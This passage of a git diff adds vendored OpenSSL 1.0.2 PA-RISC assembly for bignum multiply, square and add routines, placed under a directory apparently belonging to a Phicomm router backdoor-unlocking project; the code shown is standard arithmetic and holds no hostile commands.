+	MUL_ADD_C a3L,a3R,b5L,b5R,c3,c1,c2
+	MUL_ADD_C a2L,a2R,b6L,b6R,c3,c1,c2
+	MUL_ADD_C a1L,a1R,b7L,b7R,c3,c1,c2
+	STD       c3,64(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a2L,a2R,b7L,b7R,c1,c2,c3
+	MUL_ADD_C a3L,a3R,b6L,b6R,c1,c2,c3
+	MUL_ADD_C a4L,a4R,b5L,b5R,c1,c2,c3
+	MUL_ADD_C a5L,a5R,b4L,b4R,c1,c2,c3
+	MUL_ADD_C a6L,a6R,b3L,b3R,c1,c2,c3
+	MUL_ADD_C a7L,a7R,b2L,b2R,c1,c2,c3
+	STD       c1,72(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a7L,a7R,b3L,b3R,c2,c3,c1
+	MUL_ADD_C a6L,a6R,b4L,b4R,c2,c3,c1
+	MUL_ADD_C a5L,a5R,b5L,b5R,c2,c3,c1
+	MUL_ADD_C a4L,a4R,b6L,b6R,c2,c3,c1
+	MUL_ADD_C a3L,a3R,b7L,b7R,c2,c3,c1
+	STD       c2,80(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a4L,a4R,b7L,b7R,c3,c1,c2
+	MUL_ADD_C a5L,a5R,b6L,b6R,c3,c1,c2
+	MUL_ADD_C a6L,a6R,b5L,b5R,c3,c1,c2
+	MUL_ADD_C a7L,a7R,b4L,b4R,c3,c1,c2
+	STD       c3,88(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a7L,a7R,b5L,b5R,c1,c2,c3
+	MUL_ADD_C a6L,a6R,b6L,b6R,c1,c2,c3
+	MUL_ADD_C a5L,a5R,b7L,b7R,c1,c2,c3
+	STD       c1,96(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a6L,a6R,b7L,b7R,c2,c3,c1
+	MUL_ADD_C a7L,a7R,b6L,b6R,c2,c3,c1
+	STD       c2,104(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a7L,a7R,b7L,b7R,c3,c1,c2
+	STD       c3,112(r_ptr)
+	STD       c1,120(r_ptr)
+
+    .EXIT
+    FLDD    -88(%sp),%fr13 
+    FLDD    -96(%sp),%fr12 
+    LDD     -104(%sp),%r6        ; restore r6
+    LDD     -112(%sp),%r5        ; restore r5
+    LDD     -120(%sp),%r4        ; restore r4
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3
+
+	.PROCEND	
+
+;-----------------------------------------------------------------------------
+;
+;void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+; arg0 = r_ptr
+; arg1 = a_ptr
+; arg2 = b_ptr
+;
+
+bn_mul_comba4
+	.proc
+	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_mul_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3
+    STD     %r4,8(%sp)          ; save r4
+    STD     %r5,16(%sp)         ; save r5
+    STD     %r6,24(%sp)         ; save r6
+    FSTD    %fr12,32(%sp)       ; save r6
+    FSTD    %fr13,40(%sp)       ; save r7
+
+	;
+	; Zero out carries
+	;
+	COPY     %r0,c1
+	COPY     %r0,c2
+	COPY     %r0,c3
+
+	LDO      128(%sp),%sp       ; bump stack
+    DEPDI,Z  1,31,1,high_one     ; Create Value  1 << 32
+
+	;
+	; Load up all of the values we are going to use
+	;
+    FLDD      0(a_ptr),a0       
+    FLDD      8(a_ptr),a1       
+    FLDD     16(a_ptr),a2       
+    FLDD     24(a_ptr),a3       
+
+    FLDD      0(b_ptr),b0       
+    FLDD      8(b_ptr),b1       
+    FLDD     16(b_ptr),b2       
+    FLDD     24(b_ptr),b3       
+
+	MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
+	STD       c1,0(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
+	STD       c2,8(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
+	MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
+	MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
+	STD       c3,16(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
+	MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
+	MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
+	MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
+	STD       c1,24(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
+	STD       c2,32(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
+	MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
+	STD       c3,40(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
+	STD       c1,48(r_ptr)
+	STD       c2,56(r_ptr)
+
+    .EXIT
+    FLDD    -88(%sp),%fr13 
+    FLDD    -96(%sp),%fr12 
+    LDD     -104(%sp),%r6        ; restore r6
+    LDD     -112(%sp),%r5        ; restore r5
+    LDD     -120(%sp),%r4        ; restore r4
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3
+
+	.PROCEND	
+
+
+;--- not PIC	.SPACE	$TEXT$
+;--- not PIC	.SUBSPA	$CODE$
+;--- not PIC	.SPACE	$PRIVATE$,SORT=16
+;--- not PIC	.IMPORT	$global$,DATA
+;--- not PIC	.SPACE	$TEXT$
+;--- not PIC	.SUBSPA	$CODE$
+;--- not PIC	.SUBSPA	$LIT$,ACCESS=0x2c
+;--- not PIC	C$7
+;--- not PIC	.ALIGN	8
+;--- not PIC	.STRINGZ	"Division would overflow (%d)\n"
+	.END
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/pa-risc2W.s b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/pa-risc2W.s
new file mode 100644
index 0000000..a995457
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/pa-risc2W.s
@@ -0,0 +1,1605 @@
+;
+; PA-RISC 64-bit implementation of bn_asm code
+;
+; This code is approximately 2x faster than the C version
+; for RSA/DSA.
+;
+; See http://devresource.hp.com/  for more details on the PA-RISC
+; architecture.  Also see the book "PA-RISC 2.0 Architecture"
+; by Gerry Kane for information on the instruction set architecture.
+;
+; Code written by Chris Ruemmler (with some help from the HP C
+; compiler).
+;
+; The code compiles with HP's assembler
+;
+
+	.level	2.0W
+	.space	$TEXT$
+	.subspa	$CODE$,QUAD=0,ALIGN=8,ACCESS=0x2c,CODE_ONLY
+
+;
+; Global Register definitions used for the routines.
+;
+; Some information about HP's runtime architecture for 64-bits.
+;
+; "Caller save" means the calling function must save the register
+; if it wants the register to be preserved.
+; "Callee save" means if a function uses the register, it must save
+; the value before using it.
+;
+; For the floating point registers 
+;
+;    "caller save" registers: fr4-fr11, fr22-fr31
+;    "callee save" registers: fr12-fr21
+;    "special" registers: fr0-fr3 (status and exception registers)
+;
+; For the integer registers
+;     value zero             :  r0
+;     "caller save" registers: r1,r19-r26
+;     "callee save" registers: r3-r18
+;     return register        :  r2  (rp)
+;     return values          ; r28  (ret0,ret1)
+;     Stack pointer          ; r30  (sp) 
+;     global data pointer    ; r27  (dp)
+;     argument pointer       ; r29  (ap)
+;     millicode return ptr   ; r31  (also a caller save register)
+
+
+;
+; Arguments to the routines
+;
+r_ptr       .reg %r26
+a_ptr       .reg %r25
+b_ptr       .reg %r24
+num         .reg %r24
+w           .reg %r23
+n           .reg %r23
+
+
+;
+; Globals used in some routines
+;
+
+top_overflow .reg %r29
+high_mask    .reg %r22    ; value 0xffffffff80000000L
+
+
+;------------------------------------------------------------------------------
+;
+; bn_mul_add_words
+;
+;BN_ULONG bn_mul_add_words(BN_ULONG *r_ptr, BN_ULONG *a_ptr, 
+;								int num, BN_ULONG w)
+;
+; arg0 = r_ptr
+; arg1 = a_ptr
+; arg2 = num
+; arg3 = w
+;
+; Local register definitions
+;
+
+fm1          .reg %fr22
+fm           .reg %fr23
+ht_temp      .reg %fr24
+ht_temp_1    .reg %fr25
+lt_temp      .reg %fr26
+lt_temp_1    .reg %fr27
+fm1_1        .reg %fr28
+fm_1         .reg %fr29
+
+fw_h         .reg %fr7L
+fw_l         .reg %fr7R
+fw           .reg %fr7
+
+fht_0        .reg %fr8L
+flt_0        .reg %fr8R
+t_float_0    .reg %fr8
+
+fht_1        .reg %fr9L
+flt_1        .reg %fr9R
+t_float_1    .reg %fr9
+
+tmp_0        .reg %r31
+tmp_1        .reg %r21
+m_0          .reg %r20 
+m_1          .reg %r19 
+ht_0         .reg %r1  
+ht_1         .reg %r3
+lt_0         .reg %r4
+lt_1         .reg %r5
+m1_0         .reg %r6 
+m1_1         .reg %r7 
+rp_val       .reg %r8
+rp_val_1     .reg %r9
+
+bn_mul_add_words
+	.export	bn_mul_add_words,entry,NO_RELOCATION,LONG_RETURN
+	.proc
+	.callinfo frame=128
+    .entry
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3  
+    STD     %r4,8(%sp)          ; save r4  
+	NOP                         ; Needed to make the loop 16-byte aligned
+	NOP                         ; Needed to make the loop 16-byte aligned
+
+    STD     %r5,16(%sp)         ; save r5  
+    STD     %r6,24(%sp)         ; save r6  
+    STD     %r7,32(%sp)         ; save r7  
+    STD     %r8,40(%sp)         ; save r8  
+
+    STD     %r9,48(%sp)         ; save r9  
+    COPY    %r0,%ret0           ; return 0 by default
+    DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32    
+	STD     w,56(%sp)           ; store w on stack
+
+    CMPIB,>= 0,num,bn_mul_add_words_exit  ; if (num <= 0) then exit
+	LDO     128(%sp),%sp       ; bump stack
+
+	;
+	; The loop is unrolled twice, so if there is only 1 number
+    ; then go straight to the cleanup code.
+	;
+	CMPIB,= 1,num,bn_mul_add_words_single_top
+	FLDD    -72(%sp),fw     ; load up w into fp register fw (fw_h/fw_l)
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+	; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
+    ; two 32-bit mutiplies can be issued per cycle.
+    ; 
+bn_mul_add_words_unroll2
+
+    FLDD    0(a_ptr),t_float_0       ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    FLDD    8(a_ptr),t_float_1       ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    LDD     0(r_ptr),rp_val          ; rp[0]
+    LDD     8(r_ptr),rp_val_1        ; rp[1]
+
+    XMPYU   fht_0,fw_l,fm1           ; m1[0] = fht_0*fw_l
+    XMPYU   fht_1,fw_l,fm1_1         ; m1[1] = fht_1*fw_l
+    FSTD    fm1,-16(%sp)             ; -16(sp) = m1[0]
+    FSTD    fm1_1,-48(%sp)           ; -48(sp) = m1[1]
+
+    XMPYU   flt_0,fw_h,fm            ; m[0] = flt_0*fw_h
+    XMPYU   flt_1,fw_h,fm_1          ; m[1] = flt_1*fw_h
+    FSTD    fm,-8(%sp)               ; -8(sp) = m[0]
+    FSTD    fm_1,-40(%sp)            ; -40(sp) = m[1]
+
+    XMPYU   fht_0,fw_h,ht_temp       ; ht_temp   = fht_0*fw_h
+    XMPYU   fht_1,fw_h,ht_temp_1     ; ht_temp_1 = fht_1*fw_h
+    FSTD    ht_temp,-24(%sp)         ; -24(sp)   = ht_temp
+    FSTD    ht_temp_1,-56(%sp)       ; -56(sp)   = ht_temp_1
+
+    XMPYU   flt_0,fw_l,lt_temp       ; lt_temp = lt*fw_l
+    XMPYU   flt_1,fw_l,lt_temp_1     ; lt_temp = lt*fw_l
+    FSTD    lt_temp,-32(%sp)         ; -32(sp) = lt_temp 
+    FSTD    lt_temp_1,-64(%sp)       ; -64(sp) = lt_temp_1 
+
+    LDD     -8(%sp),m_0              ; m[0] 
+    LDD     -40(%sp),m_1             ; m[1]
+    LDD     -16(%sp),m1_0            ; m1[0]
+    LDD     -48(%sp),m1_1            ; m1[1]
+
+    LDD     -24(%sp),ht_0            ; ht[0]
+    LDD     -56(%sp),ht_1            ; ht[1]
+    ADD,L   m1_0,m_0,tmp_0           ; tmp_0 = m[0] + m1[0]; 
+    ADD,L   m1_1,m_1,tmp_1           ; tmp_1 = m[1] + m1[1]; 
+
+    LDD     -32(%sp),lt_0            
+    LDD     -64(%sp),lt_1            
+    CMPCLR,*>>= tmp_0,m1_0, %r0      ; if (m[0] < m1[0])
+    ADD,L   ht_0,top_overflow,ht_0   ; ht[0] += (1<<32)
+
+    CMPCLR,*>>= tmp_1,m1_1,%r0       ; if (m[1] < m1[1])
+    ADD,L   ht_1,top_overflow,ht_1   ; ht[1] += (1<<32)
+    EXTRD,U tmp_0,31,32,m_0          ; m[0]>>32  
+    DEPD,Z  tmp_0,31,32,m1_0         ; m1[0] = m[0]<<32 
+
+    EXTRD,U tmp_1,31,32,m_1          ; m[1]>>32  
+    DEPD,Z  tmp_1,31,32,m1_1         ; m1[1] = m[1]<<32 
+    ADD,L   ht_0,m_0,ht_0            ; ht[0]+= (m[0]>>32)
+    ADD,L   ht_1,m_1,ht_1            ; ht[1]+= (m[1]>>32)
+
+    ADD     lt_0,m1_0,lt_0           ; lt[0] = lt[0]+m1[0];
+	ADD,DC  ht_0,%r0,ht_0            ; ht[0]++
+    ADD     lt_1,m1_1,lt_1           ; lt[1] = lt[1]+m1[1];
+    ADD,DC  ht_1,%r0,ht_1            ; ht[1]++
+
+    ADD    %ret0,lt_0,lt_0           ; lt[0] = lt[0] + c;
+	ADD,DC  ht_0,%r0,ht_0            ; ht[0]++
+    ADD     lt_0,rp_val,lt_0         ; lt[0] = lt[0]+rp[0]
+    ADD,DC  ht_0,%r0,ht_0            ; ht[0]++
+
+	LDO    -2(num),num               ; num = num - 2;
+    ADD     ht_0,lt_1,lt_1           ; lt[1] = lt[1] + ht_0 (c);
+    ADD,DC  ht_1,%r0,ht_1            ; ht[1]++
+    STD     lt_0,0(r_ptr)            ; rp[0] = lt[0]
+
+    ADD     lt_1,rp_val_1,lt_1       ; lt[1] = lt[1]+rp[1]
+    ADD,DC  ht_1,%r0,%ret0           ; ht[1]++
+    LDO     16(a_ptr),a_ptr          ; a_ptr += 2
+
+    STD     lt_1,8(r_ptr)            ; rp[1] = lt[1]
+	CMPIB,<= 2,num,bn_mul_add_words_unroll2 ; go again if more to do
+    LDO     16(r_ptr),r_ptr          ; r_ptr += 2
+
+    CMPIB,=,N 0,num,bn_mul_add_words_exit ; are we done, or cleanup last one
+
+	;
+	; Top of loop aligned on 64-byte boundary
+	;
+bn_mul_add_words_single_top
+    FLDD    0(a_ptr),t_float_0        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    LDD     0(r_ptr),rp_val           ; rp[0]
+    LDO     8(a_ptr),a_ptr            ; a_ptr++
+    XMPYU   fht_0,fw_l,fm1            ; m1 = ht*fw_l
+    FSTD    fm1,-16(%sp)              ; -16(sp) = m1
+    XMPYU   flt_0,fw_h,fm             ; m = lt*fw_h
+    FSTD    fm,-8(%sp)                ; -8(sp) = m
+    XMPYU   fht_0,fw_h,ht_temp        ; ht_temp = ht*fw_h
+    FSTD    ht_temp,-24(%sp)          ; -24(sp) = ht
+    XMPYU   flt_0,fw_l,lt_temp        ; lt_temp = lt*fw_l
+    FSTD    lt_temp,-32(%sp)          ; -32(sp) = lt 
+
+    LDD     -8(%sp),m_0               
+    LDD    -16(%sp),m1_0              ; m1 = temp1 
+    ADD,L   m_0,m1_0,tmp_0            ; tmp_0 = m + m1; 
+    LDD     -24(%sp),ht_0             
+    LDD     -32(%sp),lt_0             
+
+    CMPCLR,*>>= tmp_0,m1_0,%r0        ; if (m < m1)
+    ADD,L   ht_0,top_overflow,ht_0    ; ht += (1<<32)
+
+    EXTRD,U tmp_0,31,32,m_0           ; m>>32  
+    DEPD,Z  tmp_0,31,32,m1_0          ; m1 = m<<32 
+
+    ADD,L   ht_0,m_0,ht_0             ; ht+= (m>>32)
+    ADD     lt_0,m1_0,tmp_0           ; tmp_0 = lt+m1;
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+    ADD     %ret0,tmp_0,lt_0          ; lt = lt + c;
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+    ADD     lt_0,rp_val,lt_0          ; lt = lt+rp[0]
+    ADD,DC  ht_0,%r0,%ret0            ; ht++
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt
+
+bn_mul_add_words_exit
+    .EXIT
+    LDD     -80(%sp),%r9              ; restore r9  
+    LDD     -88(%sp),%r8              ; restore r8  
+    LDD     -96(%sp),%r7              ; restore r7  
+    LDD     -104(%sp),%r6             ; restore r6  
+    LDD     -112(%sp),%r5             ; restore r5  
+    LDD     -120(%sp),%r4             ; restore r4  
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3             ; restore r3
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+;----------------------------------------------------------------------------
+;
+;BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
+;
+; arg0 = rp
+; arg1 = ap
+; arg2 = num
+; arg3 = w
+
+bn_mul_words
+	.proc
+	.callinfo frame=128
+    .entry
+	.EXPORT	bn_mul_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3  
+    STD     %r4,8(%sp)          ; save r4  
+    STD     %r5,16(%sp)         ; save r5  
+    STD     %r6,24(%sp)         ; save r6  
+
+    STD     %r7,32(%sp)         ; save r7  
+    COPY    %r0,%ret0           ; return 0 by default
+    DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32    
+	STD     w,56(%sp)           ; w on stack
+
+    CMPIB,>= 0,num,bn_mul_words_exit
+	LDO     128(%sp),%sp       ; bump stack
+
+	;
+	; See if only 1 word to do, thus just do cleanup
+	;
+	CMPIB,= 1,num,bn_mul_words_single_top
+	FLDD    -72(%sp),fw     ; load up w into fp register fw (fw_h/fw_l)
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+	; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
+    ; two 32-bit mutiplies can be issued per cycle.
+    ; 
+bn_mul_words_unroll2
+
+    FLDD    0(a_ptr),t_float_0        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    FLDD    8(a_ptr),t_float_1        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+    XMPYU   fht_0,fw_l,fm1            ; m1[0] = fht_0*fw_l
+    XMPYU   fht_1,fw_l,fm1_1          ; m1[1] = ht*fw_l
+
+    FSTD    fm1,-16(%sp)              ; -16(sp) = m1
+    FSTD    fm1_1,-48(%sp)            ; -48(sp) = m1
+    XMPYU   flt_0,fw_h,fm             ; m = lt*fw_h
+    XMPYU   flt_1,fw_h,fm_1           ; m = lt*fw_h
+
+    FSTD    fm,-8(%sp)                ; -8(sp) = m
+    FSTD    fm_1,-40(%sp)             ; -40(sp) = m
+    XMPYU   fht_0,fw_h,ht_temp        ; ht_temp = fht_0*fw_h
+    XMPYU   fht_1,fw_h,ht_temp_1      ; ht_temp = ht*fw_h
+
+    FSTD    ht_temp,-24(%sp)          ; -24(sp) = ht
+    FSTD    ht_temp_1,-56(%sp)        ; -56(sp) = ht
+    XMPYU   flt_0,fw_l,lt_temp        ; lt_temp = lt*fw_l
+    XMPYU   flt_1,fw_l,lt_temp_1      ; lt_temp = lt*fw_l
+
+    FSTD    lt_temp,-32(%sp)          ; -32(sp) = lt 
+    FSTD    lt_temp_1,-64(%sp)        ; -64(sp) = lt 
+    LDD     -8(%sp),m_0               
+    LDD     -40(%sp),m_1              
+
+    LDD    -16(%sp),m1_0              
+    LDD    -48(%sp),m1_1              
+    LDD     -24(%sp),ht_0             
+    LDD     -56(%sp),ht_1             
+
+    ADD,L   m1_0,m_0,tmp_0            ; tmp_0 = m + m1; 
+    ADD,L   m1_1,m_1,tmp_1            ; tmp_1 = m + m1; 
+    LDD     -32(%sp),lt_0             
+    LDD     -64(%sp),lt_1             
+
+    CMPCLR,*>>= tmp_0,m1_0, %r0       ; if (m < m1)
+    ADD,L   ht_0,top_overflow,ht_0    ; ht += (1<<32)
+    CMPCLR,*>>= tmp_1,m1_1,%r0        ; if (m < m1)
+    ADD,L   ht_1,top_overflow,ht_1    ; ht += (1<<32)
+
+    EXTRD,U tmp_0,31,32,m_0           ; m>>32  
+    DEPD,Z  tmp_0,31,32,m1_0          ; m1 = m<<32 
+    EXTRD,U tmp_1,31,32,m_1           ; m>>32  
+    DEPD,Z  tmp_1,31,32,m1_1          ; m1 = m<<32 
+
+    ADD,L   ht_0,m_0,ht_0             ; ht+= (m>>32)
+    ADD,L   ht_1,m_1,ht_1             ; ht+= (m>>32)
+    ADD     lt_0,m1_0,lt_0            ; lt = lt+m1;
+	ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    ADD     lt_1,m1_1,lt_1            ; lt = lt+m1;
+    ADD,DC  ht_1,%r0,ht_1             ; ht++
+    ADD    %ret0,lt_0,lt_0            ; lt = lt + c (ret0);
+	ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    ADD     ht_0,lt_1,lt_1            ; lt = lt + c (ht_0)
+    ADD,DC  ht_1,%r0,ht_1             ; ht++
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt
+    STD     lt_1,8(r_ptr)             ; rp[1] = lt
+
+	COPY    ht_1,%ret0                ; carry = ht
+	LDO    -2(num),num                ; num = num - 2;
+    LDO     16(a_ptr),a_ptr           ; ap += 2
+	CMPIB,<= 2,num,bn_mul_words_unroll2
+    LDO     16(r_ptr),r_ptr           ; rp++
+
+    CMPIB,=,N 0,num,bn_mul_words_exit ; are we done?
+
+	;
+	; Top of loop aligned on 64-byte boundary
+	;
+bn_mul_words_single_top
+    FLDD    0(a_ptr),t_float_0        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+
+    XMPYU   fht_0,fw_l,fm1            ; m1 = ht*fw_l
+    FSTD    fm1,-16(%sp)              ; -16(sp) = m1
+    XMPYU   flt_0,fw_h,fm             ; m = lt*fw_h
+    FSTD    fm,-8(%sp)                ; -8(sp) = m
+    XMPYU   fht_0,fw_h,ht_temp        ; ht_temp = ht*fw_h
+    FSTD    ht_temp,-24(%sp)          ; -24(sp) = ht
+    XMPYU   flt_0,fw_l,lt_temp        ; lt_temp = lt*fw_l
+    FSTD    lt_temp,-32(%sp)          ; -32(sp) = lt 
+
+    LDD     -8(%sp),m_0               
+    LDD    -16(%sp),m1_0              
+    ADD,L   m_0,m1_0,tmp_0            ; tmp_0 = m + m1; 
+    LDD     -24(%sp),ht_0             
+    LDD     -32(%sp),lt_0             
+
+    CMPCLR,*>>= tmp_0,m1_0,%r0        ; if (m < m1)
+    ADD,L   ht_0,top_overflow,ht_0    ; ht += (1<<32)
+
+    EXTRD,U tmp_0,31,32,m_0           ; m>>32  
+    DEPD,Z  tmp_0,31,32,m1_0          ; m1 = m<<32 
+
+    ADD,L   ht_0,m_0,ht_0             ; ht+= (m>>32)
+    ADD     lt_0,m1_0,lt_0            ; lt= lt+m1;
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    ADD     %ret0,lt_0,lt_0           ; lt = lt + c;
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    COPY    ht_0,%ret0                ; copy carry
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt
+
+bn_mul_words_exit
+    .EXIT
+    LDD     -96(%sp),%r7              ; restore r7  
+    LDD     -104(%sp),%r6             ; restore r6  
+    LDD     -112(%sp),%r5             ; restore r5  
+    LDD     -120(%sp),%r4             ; restore r4  
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3             ; restore r3
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+;----------------------------------------------------------------------------
+;
+;void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
+;
+; arg0 = rp
+; arg1 = ap
+; arg2 = num
+;
+
+bn_sqr_words
+	.proc
+	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_sqr_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3  
+    STD     %r4,8(%sp)          ; save r4  
+	NOP
+    STD     %r5,16(%sp)         ; save r5  
+
+    CMPIB,>= 0,num,bn_sqr_words_exit
+	LDO     128(%sp),%sp       ; bump stack
+
+	;
+	; If only 1, the goto straight to cleanup
+	;
+	CMPIB,= 1,num,bn_sqr_words_single_top
+    DEPDI,Z -1,32,33,high_mask   ; Create Mask 0xffffffff80000000L
+
+	;
+	; This loop is unrolled 2 times (64-byte aligned as well)
+	;
+
+bn_sqr_words_unroll2
+    FLDD    0(a_ptr),t_float_0        ; a[0]
+    FLDD    8(a_ptr),t_float_1        ; a[1]
+    XMPYU   fht_0,flt_0,fm            ; m[0]
+    XMPYU   fht_1,flt_1,fm_1          ; m[1]
+
+    FSTD    fm,-24(%sp)               ; store m[0]
+    FSTD    fm_1,-56(%sp)             ; store m[1]
+    XMPYU   flt_0,flt_0,lt_temp       ; lt[0]
+    XMPYU   flt_1,flt_1,lt_temp_1     ; lt[1]
+
+    FSTD    lt_temp,-16(%sp)          ; store lt[0]
+    FSTD    lt_temp_1,-48(%sp)        ; store lt[1]
+    XMPYU   fht_0,fht_0,ht_temp       ; ht[0]
+    XMPYU   fht_1,fht_1,ht_temp_1     ; ht[1]
+
+    FSTD    ht_temp,-8(%sp)           ; store ht[0]
+    FSTD    ht_temp_1,-40(%sp)        ; store ht[1]
+    LDD     -24(%sp),m_0             
+    LDD     -56(%sp),m_1              
+
+    AND     m_0,high_mask,tmp_0       ; m[0] & Mask
+    AND     m_1,high_mask,tmp_1       ; m[1] & Mask
+    DEPD,Z  m_0,30,31,m_0             ; m[0] << 32+1
+    DEPD,Z  m_1,30,31,m_1             ; m[1] << 32+1
+
+    LDD     -16(%sp),lt_0        
+    LDD     -48(%sp),lt_1        
+    EXTRD,U tmp_0,32,33,tmp_0         ; tmp_0 = m[0]&Mask >> 32-1
+    EXTRD,U tmp_1,32,33,tmp_1         ; tmp_1 = m[1]&Mask >> 32-1
+
+    LDD     -8(%sp),ht_0            
+    LDD     -40(%sp),ht_1           
+    ADD,L   ht_0,tmp_0,ht_0           ; ht[0] += tmp_0
+    ADD,L   ht_1,tmp_1,ht_1           ; ht[1] += tmp_1
+
+    ADD     lt_0,m_0,lt_0             ; lt = lt+m
+    ADD,DC  ht_0,%r0,ht_0             ; ht[0]++
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt[0]
+    STD     ht_0,8(r_ptr)             ; rp[1] = ht[1]
+
+    ADD     lt_1,m_1,lt_1             ; lt = lt+m
+    ADD,DC  ht_1,%r0,ht_1             ; ht[1]++
+    STD     lt_1,16(r_ptr)            ; rp[2] = lt[1]
+    STD     ht_1,24(r_ptr)            ; rp[3] = ht[1]
+
+	LDO    -2(num),num                ; num = num - 2;
+    LDO     16(a_ptr),a_ptr           ; ap += 2
+	CMPIB,<= 2,num,bn_sqr_words_unroll2
+    LDO     32(r_ptr),r_ptr           ; rp += 4
+
+    CMPIB,=,N 0,num,bn_sqr_words_exit ; are we done?
+
+	;
+	; Top of loop aligned on 64-byte boundary
+	;
+bn_sqr_words_single_top
+    FLDD    0(a_ptr),t_float_0        ; load up 64-bit value (fr8L) ht(L)/lt(R)
+
+    XMPYU   fht_0,flt_0,fm            ; m
+    FSTD    fm,-24(%sp)               ; store m
+
+    XMPYU   flt_0,flt_0,lt_temp       ; lt
+    FSTD    lt_temp,-16(%sp)          ; store lt
+
+    XMPYU   fht_0,fht_0,ht_temp       ; ht
+    FSTD    ht_temp,-8(%sp)           ; store ht
+
+    LDD     -24(%sp),m_0              ; load m
+    AND     m_0,high_mask,tmp_0       ; m & Mask
+    DEPD,Z  m_0,30,31,m_0             ; m << 32+1
+    LDD     -16(%sp),lt_0             ; lt
+
+    LDD     -8(%sp),ht_0              ; ht
+    EXTRD,U tmp_0,32,33,tmp_0         ; tmp_0 = m&Mask >> 32-1
+    ADD     m_0,lt_0,lt_0             ; lt = lt+m
+    ADD,L   ht_0,tmp_0,ht_0           ; ht += tmp_0
+    ADD,DC  ht_0,%r0,ht_0             ; ht++
+
+    STD     lt_0,0(r_ptr)             ; rp[0] = lt
+    STD     ht_0,8(r_ptr)             ; rp[1] = ht
+
+bn_sqr_words_exit
+    .EXIT
+    LDD     -112(%sp),%r5       ; restore r5  
+    LDD     -120(%sp),%r4       ; restore r4  
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3 
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+
+;----------------------------------------------------------------------------
+;
+;BN_ULONG bn_add_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
+;
+; arg0 = rp 
+; arg1 = ap
+; arg2 = bp 
+; arg3 = n
+
+t  .reg %r22
+b  .reg %r21
+l  .reg %r20
+
+bn_add_words
+	.proc
+    .entry
+	.callinfo
